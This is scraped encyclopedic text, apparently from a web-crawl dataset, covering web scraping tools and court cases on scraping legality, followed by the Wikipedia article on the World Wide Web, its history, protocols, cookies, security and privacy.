Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
697 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/World_Wide_Web | The World Wide Web (WWW or simply the Web) is an information system that enables content sharing over the Internet through user-friendly ways meant to appeal to users beyond IT specialists and hobbyists. 1 It allows documents and other web resources to be accessed over the Internet according to specific rules of the Hypertext Transfer Protocol (HTTP). 2 The Web was invented by English computer scientist Tim Berners-Lee while at CERN in 1989 and opened to the public in 1991. It was conceived as a "universal linked information system". 3 4 Documents and other media content are made available to the network through web servers and can be accessed by programs such as web browsers. Servers and resources on the World Wide Web are identified and located through character strings called uniform resource locators (URLs). The original and still very common document type is a web page formatted in Hypertext Markup Language (HTML). This markup language supports plain text, images, embedded video and audio contents, and scripts (short programs) that implement complex user interaction. The HTML language also supports hyperlinks (embedded URLs) which provide immediate access to other web resources. Web navigation, or web surfing, is the common practice of following such hyperlinks across multiple websites. Web applications are web pages that function as application software. The information in the Web is transferred across the Internet using HTTP. Multiple web resources with a common theme and usually a common domain name make up a website. A single web server may provide multiple websites, while some websites, especially the most popular ones, may be provided by multiple servers. Website content is provided by a myriad of companies, organizations, government agencies, and individual users; and comprises an enormous amount of educational, entertainment, commercial, and government information. The Web has become the world's dominant information systems platform. 5 6 7 8 It is the primary tool that billions of people worldwide use to interact with the Internet. 2 The Web was invented by English computer scientist Tim Berners-Lee while working at CERN. 9 10 He was motivated by the problem of storing, updating, and finding documents and data files in that large and constantly changing organization, as well as distributing them to collaborators outside CERN. In his design, Berners-Lee dismissed the common tree structure approach, used for instance in the existing CERNDOC documentation system and in the Unix filesystem, as well as approaches that relied in tagging files with keywords, as in the VAX NOTES system. Instead he adopted concepts he had put into practice with his private ENQUIRE system (1980) built at CERN. When he became aware of Ted Nelson's hypertext model (1965), in which documents can be linked in unconstrained ways through hyperlinks associated with "hot spots" embedded in the text, it helped to confirm the validity of his concept. 11 12 The model was later popularized by Apple's HyperCard system. Unlike Hypercard, Berners-Lee's new system from the outset was meant to support links between multiple databases on independent computers, and to allow simultaneous access by many users from any computer on the Internet. He also specified that the system should eventually handle other media besides text, such as graphics, speech, and video. 
Links could refer to mutable data files, or even fire up programs on their server computer. He also conceived "gateways" that would allow access through the new system to documents organized in other ways (such as traditional computer file systems or the Usenet). Finally, he insisted that the system should be decentralized, without any central control or coordination over the creation of links. 3 13 9 10 Berners-Lee submitted a proposal to CERN in May 1989, without giving the system a name. 3 He got a working system implemented by the end of 1990, including a browser called WorldWideWeb (which became the name of the project and of the network) and an HTTP server running at CERN. As part of that development he defined the first version of the HTTP protocol, the basic URL syntax, and implicitly made HTML the primary document format. 14 The technology was released outside CERN to other research institutions starting in January 1991, and then to the whole Internet on 23 August 1991. The Web was a success at CERN, and began to spread to other scientific and academic institutions. Within the next two years, there were 50 websites created. 15 16 CERN made the Web protocol and code available royalty free in 1993, enabling its widespread use. 17 18 After the NCSA released the Mosaic web browser later that year, the Web's popularity grew rapidly as thousands of websites sprang up in less than a year. 19 20 Mosaic was a graphical browser that could display inline images and submit forms that were processed by the HTTPd server. 21 22 Marc Andreessen and Jim Clark founded Netscape the following year and released the Navigator browser, which introduced Java and JavaScript to the Web. It quickly became the dominant browser. Netscape became a public company in 1995 which triggered a frenzy for the Web and started the dot-com bubble. 23 Microsoft responded by developing its own browser, Internet Explorer, starting the browser wars. By bundling it with Windows, it became the dominant browser for 14 years. 24 Berners-Lee founded the World Wide Web Consortium (W3C) which created XML in 1996 and recommended replacing HTML with stricter XHTML. 25 In the meantime, developers began exploiting an IE feature called XMLHttpRequest to make Ajax applications and launched the Web 2.0 revolution. Mozilla, Opera, and Apple rejected XHTML and created the WHATWG which developed HTML5. 26 In 2009, the W3C conceded and abandoned XHTML. 27 In 2019, it ceded control of the HTML specification to the WHATWG. 28 The World Wide Web has been central to the development of the Information Age and is the primary tool billions of people use to interact on the Internet. 29 30 31 8 Tim Berners-Lee states that World Wide Web is officially spelled as three separate words, each capitalised, with no intervening hyphens. 32 Nonetheless, it is often called simply the Web, and also often the web; see Capitalization of Internet for details. In Mandarin Chinese, World Wide Web is commonly translated via a phono-semantic matching to w n w i w ng ( ), which satisfies www and literally means "10,000 dimensional net", a translation that reflects the design concept and proliferation of the World Wide Web. Use of the www prefix has been declining, especially when web applications sought to brand their domain names and make them easily pronounceable. As the mobile Web grew in popularity, citation needed services like Gmail.com, Outlook.com, Myspace.com, Facebook.com and Twitter.com are most often mentioned without adding "www. 
(or, indeed, .com") to the domain. 33 In English, www is usually read as double-u double-u double-u. 34 Some users pronounce it dub-dub-dub, particularly in New Zealand. 35 Stephen Fry, in his "Podgrams" series of podcasts, pronounces it wuh wuh wuh. 36 The English writer Douglas Adams once quipped in The Independent on Sunday (1999): "The World Wide Web is the only thing I know of whose shortened form takes three times longer to say than what it's short for". 37 The terms Internet and World Wide Web are often used without much distinction. However, the two terms do not mean the same thing. The Internet is a global system of computer networks interconnected through telecommunications and optical networking. In contrast, the World Wide Web is a global collection of documents and other resources, linked by hyperlinks and URIs. Web resources are accessed using HTTP or HTTPS, which are application-level Internet protocols that use the Internet's transport protocols. 2 Viewing a web page on the World Wide Web normally begins either by typing the URL of the page into a web browser or by following a hyperlink to that page or resource. The web browser then initiates a series of background communication messages to fetch and display the requested page. In the 1990s, using a browser to view web pages—and to move from one web page to another through hyperlinks—came to be known as 'browsing, 'web surfing' (after channel surfing), or 'navigating the Web'. Early studies of this new behaviour investigated user patterns in using web browsers. One study, for example, found five user patterns: exploratory surfing, window surfing, evolved surfing, bounded navigation and targeted navigation. 38 The following example demonstrates the functioning of a web browser when accessing a page at the URL http: example.org home.html. The browser resolves the server name of the URL (example.org) into an Internet Protocol address using the globally distributed Domain Name System (DNS). This lookup returns an IP address such as 203.0.113.4 or 2001:db8:2e::7334. The browser then requests the resource by sending an HTTP request across the Internet to the computer at that address. It requests service from a specific TCP port number that is well known for the HTTP service so that the receiving host can distinguish an HTTP request from other network protocols it may be servicing. HTTP normally uses port number 80 and for HTTPS it normally uses port number 443. The content of the HTTP request can be as simple as two lines of text: The computer receiving the HTTP request delivers it to web server software listening for requests on port 80. If the webserver can fulfil the request it sends an HTTP response back to the browser indicating success: followed by the content of the requested page. Hypertext Markup Language (HTML) for a basic web page might look like this: The web browser parses the HTML and interprets the markup ( title , p for paragraph, and such) that surrounds the words to format the text on the screen. Many web pages use HTML to reference the URLs of other resources such as images, other embedded media, scripts that affect page behaviour, and Cascading Style Sheets that affect page layout. The browser makes additional HTTP requests to the web server for these other Internet media types. As it receives their content from the web server, the browser progressively renders the page onto the screen as specified by its HTML and these additional resources. 
Hypertext Markup Language (HTML) is the standard markup language for creating web pages and web applications. With Cascading Style Sheets (CSS) and JavaScript, it forms a triad of cornerstone technologies for the World Wide Web. 39 Web browsers receive HTML documents from a web server or from local storage and render the documents into multimedia web pages. HTML describes the structure of a web page semantically and originally included cues for the appearance of the document. HTML elements are the building blocks of HTML pages. With HTML constructs, images and other objects such as interactive forms may be embedded into the rendered page. HTML provides a means to create structured documents by denoting structural semantics for text such as headings, paragraphs, lists, links, quotes and other items. HTML elements are delineated by tags, written using angle brackets. Tags such as img and input directly introduce content into the page. Other tags such as p surround and provide information about document text and may include other tags as sub-elements. Browsers do not display the HTML tags, but use them to interpret the content of the page. HTML can embed programs written in a scripting language such as JavaScript, which affects the behaviour and content of web pages. Inclusion of CSS defines the look and layout of content. The World Wide Web Consortium (W3C), maintainer of both the HTML and the CSS standards, has encouraged the use of CSS over explicit presentational HTML since 1997. update 40 Most web pages contain hyperlinks to other related pages and perhaps to downloadable files, source documents, definitions and other web resources. In the underlying HTML, a hyperlink looks like this: a href "http: example.org home.html" Example.org Homepage a . Such a collection of useful, related resources, interconnected via hypertext links is dubbed a web of information. Publication on the Internet created what Tim Berners-Lee first called the WorldWideWeb (in its original CamelCase, which was subsequently discarded) in November 1990. 41 The hyperlink structure of the web is described by the webgraph: the nodes of the web graph correspond to the web pages (or URLs) the directed edges between them to the hyperlinks. Over time, many web resources pointed to by hyperlinks disappear, relocate, or are replaced with different content. This makes hyperlinks obsolete, a phenomenon referred to in some circles as link rot, and the hyperlinks affected by it are often called "dead" links. The ephemeral nature of the Web has prompted many efforts to archive websites. The Internet Archive, active since 1996, is the best known of such efforts. Many hostnames used for the World Wide Web begin with www because of the long-standing practice of naming Internet hosts according to the services they provide. The hostname of a web server is often www, in the same way that it may be ftp for an FTP server, and news or nntp for a Usenet news server. These hostnames appear as Domain Name System (DNS) or subdomain names, as in www.example.com. The use of www is not required by any technical or policy standard and many web sites do not use it; the first web server was nxoc01.cern.ch. 
42 According to Paolo Palazzi, who worked at CERN along with Tim Berners-Lee, the popular use of www as subdomain was accidental; the World Wide Web project page was intended to be published at www.cern.ch while info.cern.ch was intended to be the CERN home page; however the DNS records were never switched, and the practice of prepending www to an institution's website domain name was subsequently copied. 43 better source needed Many established websites still use the prefix, or they employ other subdomain names such as www2, secure or en for special purposes. Many such web servers are set up so that both the main domain name (e.g., example.com) and the www subdomain (e.g., www.example.com) refer to the same site; others require one form or the other, or they may map to different web sites. The use of a subdomain name is useful for load balancing incoming web traffic by creating a CNAME record that points to a cluster of web servers. Since, currently as of? , only a subdomain can be used in a CNAME, the same result cannot be achieved by using the bare domain root. 44 dubious discuss When a user submits an incomplete domain name to a web browser in its address bar input field, some web browsers automatically try adding the prefix "www" to the beginning of it and possibly .com", .org" and .net" at the end, depending on what might be missing. For example, entering "microsoft" may be transformed to http: www.microsoft.com and "openoffice" to http: www.openoffice.org. This feature started appearing in early versions of Firefox, when it still had the working title 'Firebird' in early 2003, from an earlier practice in browsers such as Lynx. 45 unreliable source? It is reported that Microsoft was granted a US patent for the same idea in 2008, but only for mobile devices. 46 The scheme specifiers http: and https: at the start of a web URI refer to Hypertext Transfer Protocol or HTTP Secure, respectively. They specify the communication protocol to use for the request and response. The HTTP protocol is fundamental to the operation of the World Wide Web, and the added encryption layer in HTTPS is essential when browsers send or retrieve confidential data, such as passwords or banking information. Web browsers usually automatically prepend http: to user-entered URIs, if omitted. A web page (also written as webpage) is a document that is suitable for the World Wide Web and web browsers. A web browser displays a web page on a monitor or mobile device. The term web page usually refers to what is visible, but may also refer to the contents of the computer file itself, which is usually a text file containing hypertext written in HTML or a comparable markup language. Typical web pages provide hypertext for browsing to other web pages via hyperlinks, often referred to as links. Web browsers will frequently have to access multiple web resource elements, such as reading style sheets, scripts, and images, while presenting each web page. On a network, a web browser can retrieve a web page from a remote web server. The web server may restrict access to a private network such as a corporate intranet. The web browser uses the Hypertext Transfer Protocol (HTTP) to make such requests to the web server. A static web page is delivered exactly as stored, as web content in the web server's file system. In contrast, a dynamic web page is generated by a web application, usually driven by server-side software. 
Dynamic web pages are used when each user may require completely different information, for example, bank websites, web email etc. A static web page (sometimes called a flat page stationary page) is a web page that is delivered to the user exactly as stored, in contrast to dynamic web pages which are generated by a web application. Consequently, a static web page displays the same information for all users, from all contexts, subject to modern capabilities of a web server to negotiate content-type or language of the document where such versions are available and the server is configured to do so. A server-side dynamic web page is a web page whose construction is controlled by an application server processing server-side scripts. In server-side scripting, parameters determine how the assembly of every new web page proceeds, including the setting up of more client-side processing. A client-side dynamic web page processes the web page using JavaScript running in the browser. JavaScript programs can interact with the document via Document Object Model, or DOM, to query page state and alter it. The same client-side techniques can then dynamically update or change the DOM in the same way. A dynamic web page is then reloaded by the user or by a computer program to change some variable content. The updating information could come from the server, or from changes made to that page's DOM. This may or may not truncate the browsing history or create a saved version to go back to, but a dynamic web page update using Ajax technologies will neither create a page to go back to nor truncate the web browsing history forward of the displayed page. Using Ajax technologies the end user gets one dynamic page managed as a single page in the web browser while the actual web content rendered on that page can vary. The Ajax engine sits only on the browser requesting parts of its DOM, the DOM, for its client, from an application server. Dynamic HTML, or DHTML, is the umbrella term for technologies and methods used to create web pages that are not static web pages, though it has fallen out of common use since the popularization of AJAX, a term which is now itself rarely used. citation needed Client-side-scripting, server-side scripting, or a combination of these make for the dynamic web experience in a browser. JavaScript is a scripting language that was initially developed in 1995 by Brendan Eich, then of Netscape, for use within web pages. 47 The standardised version is ECMAScript. 47 To make web pages more interactive, some web applications also use JavaScript techniques such as Ajax (asynchronous JavaScript and XML). Client-side script is delivered with the page that can make additional HTTP requests to the server, either in response to user actions such as mouse movements or clicks, or based on elapsed time. The server's responses are used to modify the current page rather than creating a new page with each response, so the server needs only to provide limited, incremental information. Multiple Ajax requests can be handled at the same time, and users can interact with the page while data is retrieved. Web pages may also regularly poll the server to check whether new information is available. 48 A website 49 is a collection of related web resources including web pages, multimedia content, typically identified with a common domain name, and published on at least one web server. Notable examples are wikipedia.org, google.com, and amazon.com. 
A website may be accessible via a public Internet Protocol (IP) network, such as the Internet, or a private local area network (LAN), by referencing a uniform resource locator (URL) that identifies the site. Websites can have many functions and can be used in various fashions; a website can be a personal website, a corporate website for a company, a government website, an organization website, etc. Websites are typically dedicated to a particular topic or purpose, ranging from entertainment and social networking to providing news and education. All publicly accessible websites collectively constitute the World Wide Web, while private websites, such as a company's website for its employees, are typically a part of an intranet. Web pages, which are the building blocks of websites, are documents, typically composed in plain text interspersed with formatting instructions of Hypertext Markup Language (HTML, XHTML). They may incorporate elements from other websites with suitable markup anchors. Web pages are accessed and transported with the Hypertext Transfer Protocol (HTTP), which may optionally employ encryption (HTTP Secure, HTTPS) to provide security and privacy for the user. The user's application, often a web browser, renders the page content according to its HTML markup instructions onto a display terminal. Hyperlinking between web pages conveys to the reader the site structure and guides the navigation of the site, which often starts with a home page containing a directory of the site web content. Some websites require user registration or subscription to access content. Examples of subscription websites include many business sites, news websites, academic journal websites, gaming websites, file-sharing websites, message boards, web-based email, social networking websites, websites providing real-time price quotations for different types of markets, as well as sites providing various other services. End users can access websites on a range of devices, including desktop and laptop computers, tablet computers, smartphones and smart TVs. A web browser (commonly referred to as a browser) is a software user agent for accessing information on the World Wide Web. To connect to a website's server and display its pages, a user needs to have a web browser program. This is the program that the user runs to download, format, and display a web page on the user's computer. In addition to allowing users to find, display, and move between web pages, a web browser will usually have features like keeping bookmarks, recording history, managing cookies (see below), and home pages and may have facilities for recording passwords for logging into web sites. The most popular browsers are Chrome, Firefox, Safari, Internet Explorer, and Edge. A Web server is server software, or hardware dedicated to running said software, that can satisfy World Wide Web client requests. A web server can, in general, contain one or more websites. A web server processes incoming network requests over HTTP and several other related protocols. The primary function of a web server is to store, process and deliver web pages to clients. 50 The communication between client and server takes place using the Hypertext Transfer Protocol (HTTP). Pages delivered are most frequently HTML documents, which may include images, style sheets and scripts in addition to the text content. 
A user agent, commonly a web browser or web crawler, initiates communication by making a request for a specific resource using HTTP and the server responds with the content of that resource or an error message if unable to do so. The resource is typically a real file on the server's secondary storage, but this is not necessarily the case and depends on how the webserver is implemented. While the primary function is to serve content, full implementation of HTTP also includes ways of receiving content from clients. This feature is used for submitting web forms, including uploading of files. Many generic web servers also support server-side scripting using Active Server Pages (ASP), PHP (Hypertext Preprocessor), or other scripting languages. This means that the behaviour of the webserver can be scripted in separate files, while the actual server software remains unchanged. Usually, this function is used to generate HTML documents dynamically ("on-the-fly") as opposed to returning static documents. The former is primarily used for retrieving or modifying information from databases. The latter is typically much faster and more easily cached but cannot deliver dynamic content. Web servers can also frequently be found embedded in devices such as printers, routers, webcams and serving only a local network. The web server may then be used as a part of a system for monitoring or administering the device in question. This usually means that no additional software has to be installed on the client computer since only a web browser is required (which now is included with most operating systems). An HTTP cookie (also called web cookie, Internet cookie, browser cookie, or simply cookie) is a small piece of data sent from a website and stored on the user's computer by the user's web browser while the user is browsing. Cookies were designed to be a reliable mechanism for websites to remember stateful information (such as items added in the shopping cart in an online store) or to record the user's browsing activity (including clicking particular buttons, logging in, or recording which pages were visited in the past). They can also be used to remember arbitrary pieces of information that the user previously entered into form fields such as names, addresses, passwords, and credit card numbers. Cookies perform essential functions in the modern web. Perhaps most importantly, authentication cookies are the most common method used by web servers to know whether the user is logged in or not, and which account they are logged in with. Without such a mechanism, the site would not know whether to send a page containing sensitive information or require the user to authenticate themselves by logging in. The security of an authentication cookie generally depends on the security of the issuing website and the user's web browser, and on whether the cookie data is encrypted. Security vulnerabilities may allow a cookie's data to be read by a hacker, used to gain access to user data, or used to gain access (with the user's credentials) to the website to which the cookie belongs (see cross-site scripting and cross-site request forgery for examples). 51 Tracking cookies, and especially third-party tracking cookies, are commonly used as ways to compile long-term records of individuals' browsing histories a potential privacy concern that prompted European 52 and U.S. lawmakers to take action in 2011. 
53 54 European law requires that all websites targeting European Union member states gain "informed consent" from users before storing non-essential cookies on their device. Google Project Zero researcher Jann Horn describes ways cookies can be read by intermediaries, like Wi-Fi hotspot providers. When in such circumstances, he recommends using the browser in private browsing mode (widely known as Incognito mode in Google Chrome). 55 A web search engine or Internet search engine is a software system that is designed to carry out web search (Internet search), which means to search the World Wide Web in a systematic way for particular information specified in a web search query. The search results are generally presented in a line of results, often referred to as search engine results pages (SERPs). The information may be a mix of web pages, images, videos, infographics, articles, research papers, and other types of files. Some search engines also mine data available in databases or open directories. Unlike web directories, which are maintained only by human editors, search engines also maintain real-time information by running an algorithm on a web crawler. Internet content that is not capable of being searched by a web search engine is generally described as the deep web. The deep web, 56 invisible web, 57 or hidden web 58 are parts of the World Wide Web whose contents are not indexed by standard web search engines. The opposite term to the deep web is the surface web, which is accessible to anyone using the Internet. 59 Computer scientist Michael K. Bergman is credited with coining the term deep web in 2001 as a search indexing term. 60 The content of the deep web is hidden behind HTTP forms, 61 62 and includes many very common uses such as web mail, online banking, and services that users must pay for, and which is protected by a paywall, such as video on demand, some online magazines and newspapers, among others. The content of the deep web can be located and accessed by a direct URL or IP address and may require a password or other security access past the public website page. A web cache is a server computer located either on the public Internet or within an enterprise that stores recently accessed web pages to improve response time for users when the same content is requested within a certain time after the original request. Most web browsers also implement a browser cache by writing recently obtained data to a local data storage device. HTTP requests by a browser may ask only for data that has changed since the last access. Web pages and resources may contain expiration information to control caching to secure sensitive data, such as in online banking, or to facilitate frequently updated sites, such as news media. Even sites with highly dynamic content may permit basic resources to be refreshed only occasionally. Web site designers find it worthwhile to collate resources such as CSS data and JavaScript into a few site-wide files so that they can be cached efficiently. Enterprise firewalls often cache Web resources requested by one user for the benefit of many users. Some search engines store cached content of frequently accessed websites. For criminals, the Web has become a venue to spread malware and engage in a range of cybercrimes, including (but not limited to) identity theft, fraud, espionage and intelligence gathering. 
63 Web-based vulnerabilities now outnumber traditional computer security concerns, 64 65 and as measured by Google, about one in ten web pages may contain malicious code. 66 Most web-based attacks take place on legitimate websites, and most, as measured by Sophos, are hosted in the United States, China and Russia. 67 The most common of all malware threats is SQL injection attacks against websites. 68 Through HTML and URIs, the Web was vulnerable to attacks like cross-site scripting (XSS) that came with the introduction of JavaScript 69 and were exacerbated to some degree by Web 2.0 and Ajax web design that favours the use of scripts. 70 Today as of? by one estimate, 70% of all websites are open to XSS attacks on their users. 71 Phishing is another common threat to the Web. In February 2013, RSA (the security division of EMC) estimated the global losses from phishing at $1.5 billion in 2012. 72 Two of the well-known phishing methods are Covert Redirect and Open Redirect. Proposed solutions vary. Large security companies like McAfee already design governance and compliance suites to meet post 9 11 regulations, 73 and some, like Finjan have recommended active real-time inspection of programming code and all content regardless of its source. 63 Some have argued that for enterprises to see Web security as a business opportunity rather than a cost centre, 74 while others call for "ubiquitous, always-on digital rights management" enforced in the infrastructure to replace the hundreds of companies that secure data and networks. 75 Jonathan Zittrain has said users sharing responsibility for computing safety is far preferable to locking down the Internet. 76 Every time a client requests a web page, the server can identify the request's IP address. Web servers usually log IP addresses in a log file. Also, unless set not to do so, most web browsers record requested web pages in a viewable history feature, and usually cache much of the content locally. Unless the server-browser communication uses HTTPS encryption, web requests and responses travel in plain text across the Internet and can be viewed, recorded, and cached by intermediate systems. Another way to hide personally identifiable information is by using a virtual private network. A VPN encrypts online traffic and masks the original IP address lowering the chance of user identification. When a web page asks for, and the user supplies, personally identifiable information—such as their real name, address, e-mail address, etc. web-based entities can associate current web traffic with that individual. If the website uses HTTP cookies, username, and password authentication, or other tracking techniques, it can relate other web visits, before and after, to the identifiable information provided. In this way, a web-based organization can develop and build a profile of the individual people who use its site or sites. It may be able to build a record for an individual that includes information about their leisure activities, their shopping interests, their profession, and other aspects of their demographic profile. These profiles are of potential interest to marketers, advertisers, and others. Depending on the website's terms and conditions and the local laws that apply information from these profiles may be sold, shared, or passed to other organizations without the user being informed. For many ordinary people, this means little more than some unexpected e-mails in their in-box or some uncannily relevant advertising on a future web page. 
For others, it can mean that time spent indulging an unusual interest can result in a deluge of further targeted marketing that may be unwelcome. Law enforcement, counterterrorism, and espionage agencies can also identify, target, and track individuals based on their interests or proclivities on the Web. Social networking sites usually try to get users to use their real names, interests, and locations, rather than pseudonyms, as their executives believe that this makes the social networking experience more engaging for users. On the other hand, uploaded photographs or unguarded statements can be identified to an individual, who may regret this exposure. Employers, schools, parents, and other relatives may be influenced by aspects of social networking profiles, such as text posts or digital photos, that the posting individual did not intend for these audiences. Online bullies may make use of personal information to harass or stalk users. Modern social networking websites allow fine-grained control of the privacy settings for each posting, but these can be complex and not easy to find or use, especially for beginners. 77 Photographs and videos posted onto websites have caused particular problems, as they can add a person's face to an online profile. With modern and potential facial recognition technology, it may then be possible to relate that face with other, previously anonymous, images, events, and scenarios that have been imaged elsewhere. Due to image caching, mirroring, and copying, it is difficult to remove an image from the World Wide Web. Web standards include many interdependent standards and specifications, some of which govern aspects of the Internet, not just the World Wide Web. Even when not web-focused, such standards directly or indirectly affect the development and administration of websites and web services. Considerations include the interoperability, accessibility and usability of web pages and web sites. Web standards, in the broader sense, consist of the following: Web standards are not fixed sets of rules but are constantly evolving sets of finalized technical specifications of web technologies. 84 Web standards are developed by standards organizations—groups of interested and often competing parties chartered with the task of standardization—not technologies developed and declared to be a standard by a single individual or company. It is crucial to distinguish those specifications that are under development from the ones that already reached the final development status (in the case of W3C specifications, the highest maturity level). There are methods for accessing the Web in alternative mediums and formats to facilitate use by individuals with disabilities. These disabilities may be visual, auditory, physical, speech-related, cognitive, neurological, or some combination. Accessibility features also help people with temporary disabilities, like a broken arm, or ageing users as their abilities change. 85 The Web is receiving information as well as providing information and interacting with society. The World Wide Web Consortium claims that it is essential that the Web be accessible, so it can provide equal access and equal opportunity to people with disabilities. 86 Tim Berners-Lee once noted, "The power of the Web is in its universality. Access by everyone regardless of disability is an essential aspect. 85 Many countries regulate web accessibility as a requirement for websites. 
